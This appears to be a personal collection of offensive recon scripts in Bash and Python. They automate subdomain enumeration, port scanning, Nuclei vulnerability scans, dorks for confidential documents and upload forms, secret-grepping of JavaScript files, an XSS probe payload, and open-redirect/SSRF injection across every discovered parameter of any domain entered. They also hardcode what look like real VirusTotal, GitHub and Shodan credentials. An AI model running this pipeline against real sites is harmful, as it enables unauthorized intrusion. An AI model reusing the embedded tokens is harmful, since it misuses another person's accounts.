My Bash & Python Scripts
figlet -f slant -c "Start Hacking" | lolcat && figlet -f digital -c "Hack to Learn" | lolcat && figlet -f mini -c "Dork Fear" | lolcat#!/bin/bash
figlet -f slant -c "Start Hacking" | lolcat && figlet -f digital -c "Hack to Learn" | lolcat && figlet -f mini -c "Sub Fear" | lolcat
# Step 1: Accept the domain name from the user
figlet -f small -c "Enter Domain" | lolcat
echo -e "\033[1;34mEnter the domain name:\033[0m"
read domain
# Step 2: Prepare directories
figlet -f small -c "Setting Up Output Dir" | lolcat
rm -r "subdomains_output"
output_dir="subdomains_output"
mkdir -p "$output_dir"
# Step 3: Start Passive Enum
figlet -f small -c "Passive: Subfinder" | lolcat
subfinder -d $domain -all -recursive -t 200 -o subfinder.txt
figlet -f small -c "Passive: Assetfinder" | lolcat
assetfinder --subs-only $domain | tee assetfinder.txt
figlet -f small -c "Passive: Findomain" | lolcat
findomain --quiet -t $domain -u findomain.txt
figlet -f small -c "Passive: Web Archive" | lolcat
curl -s "http://web.archive.org/cdx/search/cdx?url=*.$domain/*&output=text&fl=original&collapse=urlkey" |sort| sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sort -u | tee wayback.txt
figlet -f small -c "Passive: crt.sh" | lolcat
curl -s "https://crt.sh/?q=%25.$domain&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt.txt
figlet -f small -c "Passive: Virustotal" | lolcat
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=e4726b21a95fb9db348aaa70bbe44121aa5054ada6171a61e680fc2b398bdbe1&domain=$domain" | grep -oE '[a-zA-Z0-9.-]+\.[a-z]{2,}' | sort -u | tee virustotal.txt
figlet -f small -c "Passive: GitHub" | lolcat
export GITHUB_TOKEN=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
github-subdomains -d $domain -o github-subdomains.txt
figlet -f small -c "Passive: Amass" | lolcat
amass enum -d $domain -o domains-amass.txt -timeout 12 -v
cat domains-amass.txt | grep $domain | grep -oP '^\S+' | sort -u > raw-amass.txt
cat raw-amass.txt | sed 's/\x1b\[[0-9;]*m//g' > amass.txt
# Step 4: Sorting Passive Subdomains
figlet -f small -c "Sorting Passive Subdomains" | lolcat
cat amass.txt github-subdomains.txt crt.txt wayback.txt virustotal.txt assetfinder.txt subfinder.txt findomain.txt | sort -u | sed -E 's#https?://##; s/:([0-9]+)//' | tee "$output_dir/passive-subs.txt"
# Step 5: Start Active/Brute Enum
figlet -f small -c "Active: Knockpy" | lolcat
knockpy -d $domain --recon --bruteforce | grep -oP 'https?://[a-zA-Z0-9.-]+(:[0-9]+)?' | tee knockpy.txt
figlet -f small -c "Active: Alterx + DNSX with Multiple Variations" | lolcat
cat subfinder.txt | alterx | tee dnsx-subs.txt
echo "$domain" | alterx | tee -a dnsx-subs.txt
echo "$domain" | alterx -enrich | tee -a dnsx-subs.txt
echo "$domain" | alterx -pp word=/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt | tee -a dnsx-subs.txt && cat dnsx-subs.txt | wc -l
figlet -f small -c "Active: dnsx-subs Resolve" | lolcat
puredns resolve dnsx-subs.txt --threads 250 --resolvers resolvers.txt --resolvers-trusted trusted.txt --rate-limit 1000 | tee alterx.txt
figlet -f small -c "Active: Puredns Services-Names-Wordlist" | lolcat
puredns bruteforce services-names.txt $domain | grep -oE '[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' | tee services-puredns.txt
figlet -f small -c "Active: Puredns 2m-Subdomains-Wordlist" | lolcat
puredns bruteforce 2m-subdomains.txt $domain | grep -oE '[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' | tee active-puredns.txt
# Step 6: Sorting Active Subdomains
figlet -f small -c "Sorting Active Subdomains" | lolcat
cat active-puredns.txt services-puredns.txt knockpy.txt alterx.txt | sort -u | sed -E 's#https?://##; s/:([0-9]+)//' | tee "$output_dir/active-subs.txt"
# Step 7: Merging Active Passive Subdomains
figlet -f small -c "Merging Active Passive Subdomains" | lolcat
cat "$output_dir/active-subs.txt" "$output_dir/passive-subs.txt" | sort -u | tee "$output_dir/subdomains.txt"
# Step 8: Probing Live Subs
figlet -f small -c "Probing Live Subs" | lolcat
cat "$output_dir/subdomains.txt" | httpx-toolkit -ports 80,443,8080,8000,8888,8881,8889 -threads 200 | sort -u | tee "$output_dir/livesubdomains.txt"
cat "$output_dir/livesubdomains.txt" | wc -l
# Step 9: Status 200
figlet -f small -c "Status 200 Subs" | lolcat
cat "$output_dir/livesubdomains.txt" | httpx -mc 200 | tee "$output_dir/200_livesubdomains.txt"
cat "$output_dir/200_livesubdomains.txt" | wc -l
# Step 10: 403 restricted Filtering
figlet -f small -c "restricted subdomain Filter for Information disclosure" | lolcat
cat "$output_dir/livesubdomains.txt" | httpx -mc 403 -o "$output_dir/403_sub.txt"
# Step 11: 404 not found Filtering
figlet -f small -c "restricted subdomain Filter for Information disclosure" | lolcat
cat "$output_dir/livesubdomains.txt" | httpx -mc 404 -o "$output_dir/404_sub.txt"
# Step 12: Recon with favicon hash to find more targets
figlet -f small -c "Recon with favicon hash to find more targets" | lolcat
cat "$output_dir/livesubdomains.txt" | httpx -path /favicon.ico -mc 200 -o "$output_dir/live-favicon.txt"
# Step 13: Keyword Filtering
figlet -f small -c "Keyword Filter" | lolcat
cat "$output_dir/livesubdomains.txt" | grep -E 'api|prod|test|dev|staging|secure|login|admin|beta|support|private|internal|demo|management|dashboard|config|service|analytics|auth' > "$output_dir/important_subs.txt"
# Step 14: Tech Analysis
figlet -f small -c "Tech Stack" | lolcat
cat "$output_dir/livesubdomains.txt" | httpx -sc -location -title -server -td -follow-redirects > "$output_dir/httpx_domains.txt"
# Step 15: Language Filter
figlet -f small -c "Language Filter" | lolcat
cat "$output_dir/httpx_domains.txt" | grep -i php | awk '{print $1}' > "$output_dir/php-html_domains.txt"
cat "$output_dir/httpx_domains.txt" | grep -i asp | awk '{print $1}' > "$output_dir/asp-aspx_domains.txt"
cat "$output_dir/httpx_domains.txt" | grep -i java | awk '{print $1}' > "$output_dir/jsp-jspx-htm-do-actiom_domains.txt"
cat "$output_dir/httpx_domains.txt" | grep -i CFML | awk '{print $1}' > "$output_dir/cfm-html-htm_domains.txt"
cat "$output_dir/httpx_domains.txt" | grep -i perl | awk '{print $1}' > "$output_dir/pl-html-htm_domains.txt"
# Step 16: Server Filter
figlet -f small -c "Server Filter" | lolcat
cat "$output_dir/httpx_domains.txt" | grep -i Oracle-HTTP-Server | awk '{print $1}' | tee "$output_dir/Default_Server.txt"
cat "$output_dir/httpx_domains.txt" | grep -i Microsoft-IIS/ | awk '{print $1}' | tee -a "$output_dir/Default_Server.txt"
cat "$output_dir/httpx_domains.txt" | grep -i Tomcat | awk '{print $1}' | tee -a "$output_dir/Default_Server.txt"
cat "$output_dir/httpx_domains.txt" | grep -i Adobe ColdFusion | awk '{print $1}' | tee -a "$output_dir/Default_Server.txt"
# Step 17: Clean Intermediate Files
figlet -f small -c "Cleanup" | lolcat
rm dnsx-subs.txt wayback.txt virustotal.txt github-subdomains.txt puredns.txt crt.txt assetfinder.txt subfinder.txt findomain.txt amass.txt raw-amass.txt domains-amass.txt subdomains.txt
# Step 18: checking subdomain takeover
figlet -f small -c "Checking Subdomain Takeover" | lolcat
nuclei -list "$output_dir/livesubdomains.txt" -t /detect-all-takeovers.yaml -o "$output_dir/sub-takeovers.txt"
shodan init qR2Cu00BTenPnQANNB7lB85Nd4GesofA && shodan search hostname:"$domain" 200 --fields ip_str | tee all-ip.txt
shodan init qR2Cu00BTenPnQANNB7lB85Nd4GesofA && shodan search ssl.cert.subject.CN:"$domain" 200 --fields ip_str | tee -a all-ip.txt
cat all-ip.txt | sort -u | tee "$output_dir/ip.txt" && rm all-ip.txt && cat "$output_dir/ip.txt" | wc -l
cat "$output_dir/ip.txt" "$output_dir/livesubdomains.txt" | tee "$output_dir/assets.txt"
naabu -tp 1000 -l "$output_dir/assets.txt" -c 100 | tee "$output_dir/internal-development-services.txt"
cat "$output_dir/internal-development-services.txt" | httpx -title -sc -td -location -o "$output_dir/development-services-detection.txt"
# Step 18: Merging All Assets
figlet -f small -c "Merging livesubdomains + ip + internal-development-services" | lolcat
cat "$output_dir/assets.txt" "$output_dir/internal-development-services.txt" | tee "$output_dir/all-data.txt"
# Step 18: subdomains CVE + Tech Mapping
figlet -f small -c "subdomains CVE + Tech Mapping" | lolcat
nuclei -list "$output_dir/all-data.txt" -tags cve,osint,tech --s info,high,critical,medium -o "$output_dir/subdomain-CVE.txt"
# Step 19: checking subdomain takeover
figlet -f small -c "Checking Subdomain Takeover" | lolcat
subzy run --targets "$output_dir/livesubdomains.txt" --concurrency 100 --hide_fails --verify_ssl
figlet -f slant -c "All Tasks Done!" | lolcat#!/bin/bash
figlet -f slant -c "Start Hacking" | lolcat && figlet -f digital -c "Hack to Learn" | lolcat && figlet -f mini -c "Sub Fear" | lolcat
# Step 1: Accept the domain name from the user
echo -e "\033[1;34mEnter the domain name:\033[0m"
read domain
# step 2: Create a subdomains_output directory if it doesn't exist
rm -r "subdomains_output"
output_dir="subdomains_output"
mkdir -p "$output_dir"
# Step 3: Run My Passive and Active Sources and save output in subdomains_output Directory
echo "Running Script with passive sources (subfinder, assetfinder, findomain, crt.sh, knockpy)..."
subfinder -d $domain -all -recursive -t 200 -o subfinder.txt
assetfinder --subs-only $domain > assetfinder.txt
findomain --quiet -t $domain -u findomain.txt
curl -s "https://web.archive.org/cdx/search/cdx?url=*.$domain&fl=original&collapse=urlkey" | awk -F/ '{print $3}' | sort -u | tee /home/kali/xss_test/archive.txt
curl -s "https://crt.sh/?q=%25.$domain&output=json" | jq -r '.[].name_value' | tee /home/kali/xss_test/crt.txt
knockpy -d $domain --recon --bruteforce | grep -oP 'https?://[a-zA-Z0-9.-]+(:[0-9]+)?' | tee knockpy.txt
puredns bruteforce 2m-subdomains.txt $domain | grep -oE '[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' | tee puredns.txt
cat knockpy.txt puredns.txt crt.txt archive.txt assetfinder.txt subfinder.txt findomain.txt > subdomains.txt
sort -u subdomains.txt > sort.txt
cat sort.txt | httpx -silent -threads 50 | tee "$output_dir/livesubdomains.txt"
cat "$output_dir/livesubdomains.txt" | wc -l
# Step 4: Extract 200 status Domains
echo "Running Script Extract 200 status Domains..."
cat "$output_dir/livesubdomains.txt" | httpx -mc 200 > "$output_dir/200_livesubdomains.txt"
# Step 5: Port Scanning on All subdomains
echo "Port Scanning to Identifying anomalies and potential internal development services..."
naabu -tp 1000 -l sort.txt -o "$output_dir/sub-with-ports.txt"
cat "$output_dir/sub-with-ports.txt" | httpx -title -sc -location -ip -cname -follow-redirects | tee "$output_dir/exposed-services.txt"
# Step 6: IP DNS Scanning with All Ports to expose internal development services
echo "IP DNS Scanning with All Ports to Expose internal development services..."
dnsx -l "$output_dir/livesubdomains.txt" -silent -a -resp-only -o all-ip.txt && cat all-ip.txt | sort -u | tee "$output_dir/ip.txt"
naabu -tp 1000 -l "$output_dir/ip.txt" -o "$output_dir/ip-with-ports.txt"
cat "$output_dir/ip-with-ports.txt" | httpx -title -sc -location -cname -follow-redirects | tee -a "$output_dir/exposed-services.txt"
# Step 5: Remove the intermediate files
echo "Remove the intermediate files..."
rm knockpy.txt puredns.txt crt.txt archive.txt assetfinder.txt subfinder.txt findomain.txt subdomains.txt sort.txt all-ip.txt
# Step 6: Filter Domains Technologies
echo "Filter Domains Technologies..."
cat "$output_dir/livesubdomains.txt" | httpx -td -title -sc -ip > "$output_dir/httpx_domains.txt"
# Step 7: File Domain Language wise
echo "File Domain Language wise..."
cat "$output_dir/httpx_domains.txt" | grep -i php | awk '{print $1}' > "$output_dir/php-html_domains.txt"
cat "$output_dir/httpx_domains.txt" | grep -i asp | awk '{print $1}' > "$output_dir/asp-aspx_domains.txt"
cat "$output_dir/httpx_domains.txt" | grep -i java | awk '{print $1}' > "$output_dir/jsp-jspx-htm-do-actiom_domains.txt"
cat "$output_dir/httpx_domains.txt" | grep -i CFML | awk '{print $1}' > "$output_dir/cfm-html-htm_domains.txt"
cat "$output_dir/httpx_domains.txt" | grep -i perl | awk '{print $1}' > "$output_dir/pl-html-htm_domains.txt"
# Step 8: File Domain Server wise
echo "Filter Domains Server wise..."
cat "$output_dir/httpx_domains.txt" | grep -i apache | awk '{print $1}' > "$output_dir/Apache_Server.txt"
cat "$output_dir/httpx_domains.txt" | grep -i Nginx | awk '{print $1}' > "$output_dir/Nginx_Server.txt"
cat "$output_dir/httpx_domains.txt" | grep -i IIS | awk '{print $1}' > "$output_dir/IIS-Windows_Server.txt"
cat "$output_dir/httpx_domains.txt" | grep -i oracle | awk '{print $1}' > "$output_dir/Oracle-weblogic_Server.txt"
cat "$output_dir/httpx_domains.txt" | grep -i Tomcat | awk '{print $1}' > "$output_dir/Apache_Tomcat_Server.txt"
cat "$output_dir/httpx_domains.txt" | grep -i httpd | awk '{print $1}' > "$output_dir/httpd_Tomcat_Server.txt"
cat "$output_dir/httpx_domains.txt" | grep -i Adobe ColdFusion | awk '{print $1}' > "$output_dir/Adobe-ColdFusion.txt"
# Step 9: File Domain WAF wise
echo "Filter Domains Language wise..."
cat "$output_dir/httpx_domains.txt" | grep -i Cloudflare | awk '{print $1}' > "$output_dir/Cloudflare_WAF.txt"
cat "$output_dir/httpx_domains.txt" | grep -i Akamai | awk '{print $1}' > "$output_dir/Akamai_WAF.txt"
cat "$output_dir/httpx_domains.txt" | grep -i Amazon CloudFront | awk '{print $1}' > "$output_dir/Amazon_CloudFront_WAF.txt"
cat "$output_dir/httpx_domains.txt" | grep -i imperva | awk '{print $1}' > "$output_dir/imperva_WAF.txt"
# Step 10: Capture Screenshorts Domains
echo "Capture Screenshorts Domains..."
gowitness scan file -f "$output_dir/livesubdomains.txt" --delay 4 --screenshot-fullpage --screenshot-path screenshots/ --write-csv-file 100sshost.csv --write-db
gowitness report generate --screenshot-path screenshots/ --zip-name screenshots-report.zip
chmod +x screenshots-report.zip
unzip screenshots-report.zip -d "$output_dir/sc-report"
rm -r screenshots
# Step 12: Find Hidden Parameters on all Subdomains
arjun -i "$output_dir/200_livesubdomains.txt" -oT "$output_dir/arjun.txt"
# Step 12: Run Nuclei on all Subdomains
cat "$output_dir/livesubdomains.txt" | nuclei -t /home/kali/xss_test/nuclei-templates/subdomains-check-templates -o "$output_dir/swagger-xss.txt"
cat "$output_dir/livesubdomains.txt" | nuclei -t vulnerabilities/ -o "$output_dir/vulnerabilities_nuclei.txt"
cat "$output_dir/livesubdomains.txt" | nuclei -t exposures/ -o "$output_dir/exposures_nuclei.txt"
cat "$output_dir/livesubdomains.txt" | nuclei -t misconfiguration/ -o "$output_dir/misconfiguration_nuclei.txt"
cat "$output_dir/livesubdomains.txt" | nuclei -t cves/ -o "$output_dir/cves_nuclei.txt"
cat "$output_dir/livesubdomains.txt" | nuclei -t exposed-panels/ -o "$output_dir/exposed-panels_nuclei.txt"
cat "$output_dir/livesubdomains.txt" | nuclei -t default-logins/ -o "$output_dir/default_logins_nuclei.txt"
cat "$output_dir/livesubdomains.txt" | nuclei -t takeovers/ -o "$output_dir/takeovers_nuclei.txt"#!/bin/bash
figlet -f slant -c "Start Hacking" | lolcat && figlet -f digital -c "Hack to Learn" | lolcat && figlet -f mini -c "Dork Fear" | lolcat
# Set color codes for user prompts (optional, for styling)
GREENBOLD="\e[1;32m"
NC="\e[0m" # No Color
# Ask the user for the website URL or domain
echo -e "${GREENBOLD}Enter the website URL or domain (without protocol, e.g., example.com): ${NC}"
read website_input
# Normalize the input: Add "https://" if the input is just a domain without protocol
if [[ ! $website_input =~ ^https?:// ]]; then
website_url="https://$website_input"
website_without_protocol="$website_input" # No protocol for checking subdomains
else
website_url="$website_input"
website_without_protocol="${website_input#https://}" # Remove https://
website_without_protocol="${website_without_protocol#http://}" # Remove http://
fi
# Define lists of extensions, keywords, and parameters
file_extensions=("xlsx" "xls" "csv" "doc" "docx" "pdf" "txt" "odt" "odf" "ppt" "pptx")
keywords=("confidential" "PRIVATE ASSET" "COMPANY SENSITIVE" "SENSITIVE" "STRICTLY CONFIDENTIAL" "HIGHLY CONFIDENTIAL" "ONLY FOR" "Not for Public Release" "internal use only" "do not distribute" "PRIVATE AND CONFIDENTIAL")
datasite=("drive.google.com" "onedrive.live.com" "docs.google.com" "groups.google.com" "googleapis.com" "dropbox.com/s" "box.com/s" "dev.azure.com" "sharepoint.com" "blob.core.windows.net" "digitaloceanspaces.com" "firebaseio.com" "jfrog.io" "s3.amazonaws.com")
intextkeywords=("choose file" "choose files" "No file chosen" "Submit Content")
inurlkeywords=("uploadform")
web_extensions=("php" "html" "xhtml" "htm" "asp" "aspx" "jsp" "jspx" "jsf" "do" "action")
parameters=("=https" "%2F" "redir=" "redirect=" "return_to=" "redirect_url=" "redirect_uri=" "redirect_to=" "url=" ".=https")
shodan_extensions=("php" "java" "ASP.NET" "perl" "CFML" "Adobe ColdFusion" "Swagger UI")
paths=("phpinfo()" "Swagger UI" "admin" "dashboard" "signin" "login" "panel" "Check Point" "Ivanti Connect" "HugeGraph")
# Output search queries
for ext in "${file_extensions[@]}"; do
echo "site:.$website_without_protocol ext:$ext"
done
echo ""
for ext in "${file_extensions[@]}"; do
echo "site:.$website_without_protocol ext:$ext name @gmail.com phone"
done
echo ""
for data in "${datasite[@]}"; do
echo "site:.$data .$website_without_protocol"
done
echo ""
for words in "${keywords[@]}"; do
for ext in "${file_extensions[@]}"; do
echo "site:.$website_without_protocol intext:$words ext:$ext"
done
done
echo ""
for textkeywords in "${intextkeywords[@]}"; do
echo "site:.$website_without_protocol intext:$textkeywords"
done
echo ""
for urlkeywords in "${inurlkeywords[@]}"; do
echo "site:.$website_without_protocol inurl:$urlkeywords"
done
echo ""
for ext in "${web_extensions[@]}"; do
for urlkeywords in "${inurlkeywords[@]}"; do
echo "site:.$website_without_protocol inurl:$urlkeywords filetype:$ext"
done
done
echo ""
for param in "${parameters[@]}"; do
echo "site:.$website_without_protocol inurl:\"$param\""
done
echo ""
for ext in "${web_extensions[@]}"; do
echo "site:.$website_without_protocol ext:$ext"
done
echo ""
for ext in "${web_extensions[@]}"; do
echo "site:.$website_without_protocol ext:$ext inurl:& | inurl:? | inurl:="
done
echo ""
for ext in "${shodan_extensions[@]}"; do
echo "hostname:.$website_without_protocol http.component:$ext"
done
echo ""
for path in "${paths[@]}"; do
echo "hostname:.$website_without_protocol http.title:\"$path\""
done
#!/bin/sh
# Usage ./unique_directories.sh urls.txt
rm unique_urls.txt > /dev/null
cat $1 | rev | cut -d/ -f2- | rev | sort -u | anew unique_urls.txt > /dev/null
for i in {1..10}; do cat unique_urls.txt | rev | cut -d/ -f2- | rev | sort -u | anew unique_urls.txt > /dev/null; done
sed -i "" "s/$/\//g" unique_urls.txt
sed -i "" "/^\/$/d" unique_urls.txt
sed -e "/\/\/$/d" unique_urls.txt | grep -Ev "(:/|://)$" | sort -u#!/bin/bash
figlet -f slant -c "Start Hacking" | lolcat && figlet -f digital -c "Hack to Learn" | lolcat && figlet -f mini -c "JS Fear" | lolcat
# Path to the file containing URLs
url_file="js.txt"
# Check if the file exists
if [ ! -f "$url_file" ]; then
echo "File $url_file not found!"
exit 1
fi
# Customize grep highlight color (e.g., green)
export GREP_COLORS='mt=01;32'
# Read each URL from the file
while IFS= read -r url; do
echo "Scanning $url..."
# Run the curl command and grep for sensitive keywords with highlighting
curl -s -X GET "$url" | grep -i --color=always -E 'password|pwd|pass|passphrase|credentials|encryptKey|appKey|token|secret|Authorization|Key|private'
echo "----------------------------------------"
done < "$url_file"#!/usr/bin/python3
import os
# Command templates
base_url_1 = 'echo "{}" | Gxss -p asad'
base_url_2 = 'echo "{}" | kxss'
red_color = '\033[31m' # Red color code
green_color = '\033[32m' # Green color code
yellow_color = '\033[33m' # Yellow color code
reset_color = '\033[0m' # Reset color code
with open('/home/kali/xss_test/endpoints_output/fuzz_parameters.txt', mode='r') as file:
while line := file.readline():
# 1st Command
command_1 = base_url_1.format(line.rstrip())
# Printing the 1st command in red
print(f"{red_color}{command_1}{reset_color}")
print(os.popen(command_1).read())
print(f"{yellow_color}"+"********************************************")
# 2nd Command
command_2 = base_url_2.format(line.rstrip())
# Printing the 2nd command in red
print(f"{red_color}{command_2}{reset_color}")
print(os.popen(command_2).read())
print(f"{yellow_color}"+"********************************************")#!/bin/bash
# Create a nuclei_output directory if it doesn't exist
output_dir="nuclei_output"
mkdir -p "$output_dir"
# Start Scanning....
echo "Start Automate_Scanning...."
cat "subdomains_output/livesubdomains.txt" | nuclei -as -o "$output_dir/tech_detect_nuclei.txt"
cat "subdomains_output/livesubdomains.txt" | nuclei -t vulnerabilities/ -o "$output_dir/vulnerabilities_nuclei.txt"
cat "subdomains_output/livesubdomains.txt" | nuclei -t exposures/ -o "$output_dir/exposures_nuclei.txt"
cat "subdomains_output/livesubdomains.txt" | nuclei -t cves/ -o "$output_dir/cves_nuclei.txt"
cat "subdomains_output/livesubdomains.txt" | nuclei -t /home/kali/target/nuclei-templates/subdomains-check-templates -o "$output_dir/swagger-xss.txt"
cat "subdomains_output/livesubdomains.txt" | nuclei -t exposed-panels/ -o "$output_dir/exposed-panels_nuclei.txt"
cat "subdomains_output/livesubdomains.txt" | nuclei -t misconfiguration/ -o "$output_dir/misconfiguration_nuclei.txt"
cat "subdomains_output/livesubdomains.txt" | nuclei -t default-logins/ -o "$output_dir/default_logins_nuclei.txt"
cat "subdomains_output/livesubdomains.txt" | nuclei -t takeovers/ -o "$output_dir/takeovers_nuclei.txt"
# Start Scanning Vulnerabilities wise....
echo "Start Automate_Scanning Vulnerabilities wise...."
nuclei -l "subdomains_output/livesubdomains.txt" --tags lfi -c 30 -o "$output_dir/lfi_nuclei.txt"#!/bin/bash
# Color definitions
REDCOLOR="\e[31m"
GREENBOLD="\e[1;32m"
WELCOMCOLOR="\e[1;3;33m"
CYANBOLD="\e[1;36m"
NC="\e[0m"
# Function to display the welcome message with cool ASCII art
function show_welcome {
clear
# Display ASCII art for title and user message
figlet -f slant "Recon Fear" | lolcat -a -s 100
echo -e "${CYANBOLD}------------------------------- Created by Muhammad Asad -------------------------------\n"
echo -e "${REDCOLOR}------------------------------------------------------------------------------------------"
echo -e "${WELCOMCOLOR}=========================== WELCOME To My Aowsome Recon Script! ==========================\n"
}
# Main script execution
show_welcome
# Sample random quote or message
arr=("Knowledge is power, let’s hack it right!" "Prepare yourself for an awesome recon journey..." "Hacking is an art, not a crime.")
random=$((RANDOM % 4))
# Display random message
echo -e "${GREENBOLD}${arr[$random]}\n"
# Stylish separator
echo -e "${REDCOLOR}------------------------------------------------------------------------------------------$NC\n"
# Ask the user for the website URL or domain
echo -e "${GREENBOLD}Enter the website URL or domain: ${NC}"
read website_input
echo -e "$REDCOLOR----------------------------------------------------------------------------------------------$NC\n"
# Normalize the input: Add "https://" if the input is just a domain without protocol
if [[ ! $website_input =~ ^https?:// ]]; then
website_url="https://$website_input"
website_without_protocol="$website_input" # No protocol for paramspider
else
website_url="$website_input"
website_without_protocol="${website_input#https://}" # Remove both http and https
website_without_protocol="${website_without_protocol#http://}" # Remove both http and https
fi
# Inform the user of the normalized URL being used
echo -e "${REDCOLOR}Normalized URL with protocol: $website_url"
echo -e "${REDCOLOR}Website URL without protocol: $website_without_protocol"
# Ask the user for the the domain Webhook.site_URL
echo -e "\033[1;34mEnter the domain Webhook.site_URL for Check SSRF OR Open-Redirect:\033[0m"
read URL
# Create a endpoints_output directory if it doesn't exist
rm -r "endpoints_output"
output_dir="endpoints_output"
mkdir -p "$output_dir"
# Step 1: Run katana with passive sources and save output to a unified file ("all_endpoints.txt")
echo -e "${REDCOLOR}Running katana with passive sources (waybackarchive, commoncrawl, alienvault)...\n"
echo "$website_url" | katana -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | tee "$output_dir/all_endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 2: Run waybackurl passively and append results to "all_endpoints.txt"
echo -e "${REDCOLOR}Running waybackurl passively..."
waybackurls "$website_url" | tee -a "$output_dir/all_endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 3: Run gau passively and append results to "all_endpoints.txt"
echo -e "${REDCOLOR}Running gau passively..."
gau "$website_url" | tee -a "$output_dir/all_endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 4: Run katana actively with depth 2 and append results to "all_endpoints.txt"
echo -e "${REDCOLOR}Running katana actively with depth 2..."
katana -u "$website_url" -d 2 -jc -f qurl | tee -a "$output_dir/all_endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 5: Filter "all_endpoints.txt" for Unique Endpoints
echo -e "Filtering Unique Endpoints for Vulnerabilities ..."
cat "$output_dir/all_endpoints.txt" | uro > "$output_dir/endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 6: Filter "endpoints.txt" for FUZZ different vulnerabilities
echo -e "Filtering Parametrs for Vulnerabilities ..."
cat "$output_dir/endpoints.txt" | grep "=" | sort -u > "$output_dir/fuzz_parameters.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 7: Parameter discovery using ParamSpider
echo -e "Perform parameter discovery using ParamSpider..."
paramspider -d "$website_without_protocol" --stream | grep -oP 'http[s]?://\S+' | tee -a "$output_dir/fuzz_parameters.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 8: XSS Testing on All Pasive Parameters with Quick Analysis)
echo "Running XSS Testing on All Parameters with Quick Analysis..."
cat "endpoints_output/fuzz_parameters.txt" | Gxss -p '">asad<hacked' | tee "endpoints_output/passive-xss.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 9: Open Redirect OR SSRF Testing on All Pasive Parameters with Quick Analysis)
echo "Running Open Redirect OR SSRF Testing on All Parameters with Webhook.site_URL..."
cat "$output_dir/fuzz_parameters.txt" | qsreplace $URL | tee "$output_dir/open-redirect.txt"
cat "$output_dir/open-redirect.txt" | httpx -status-code -title -location > "$output_dir/check-open-redirect.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 10: Filter "endpoints.txt" for different vulnerabilities
# XSS
echo -e "${REDCOLOR}Filtering URLs for potential XSS endpoints..."
cat "$output_dir/endpoints.txt" | gf xss | sort -u > "$output_dir/xss_endpoints.txt"
echo "Extracting final filtered URLs to xss_endpoints.txt..."
# Open Redirect
echo -e "${REDCOLOR}Filtering URLs for potential Open Redirect endpoints..."
cat "$output_dir/endpoints.txt" | gf redirect | sort -u > "$output_dir/open_redirect_endpoints.txt"
# LFI
echo -e "${REDCOLOR}Filtering URLs for potential LFI endpoints..."
cat "$output_dir/endpoints.txt" | gf lfi | sort -u > "$output_dir/lfi_endpoints.txt"
# SQLi
echo -e "${REDCOLOR}Filtering URLs for potential SQLi endpoints..."
cat "$output_dir/endpoints.txt" | gf sqli | sort -u > "$output_dir/sqli_endpoints.txt"
# SSRF
echo -e "${REDCOLOR}Filtering URLs for potential SSRF endpoints..."
cat "$output_dir/endpoints.txt" | gf ssrf | sort -u > "$output_dir/ssrf_endpoints.txt"
# RCE
echo -e "${REDCOLOR}Filtering URLs for potential SQLi endpoints..."
cat "$output_dir/endpoints.txt" | gf rce | sort -u > "$output_dir/rce_endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# step 11: Extract the ext-Endpoints for Find Hidden Parameters with Arjun and save output to a file (ext_endpoint.txt)
echo -e "Filtering Ext-Endpoint for Find Hidden Parameters with Arjun..."
cat "$output_dir/endpoints.txt" | grep ".php$" | tee "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".html$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".xhtm$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".xhtml$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".shtml$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".htm$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".htn$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".asp$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".aspx$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".ashx$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".asmx$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".pl$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".cfm$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".jsp$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".jspx$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".jsf$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".do$" | tee -a "$output_dir/ext_endpoints.txt"
cat "$output_dir/endpoints.txt" | grep ".action$" | tee -a "$output_dir/ext_endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 12: Filtering Unique Ext-Endpoints
echo -e "Ext-Endpoints Filtering Unique for Parameter Fuzzing with Arjun ..."
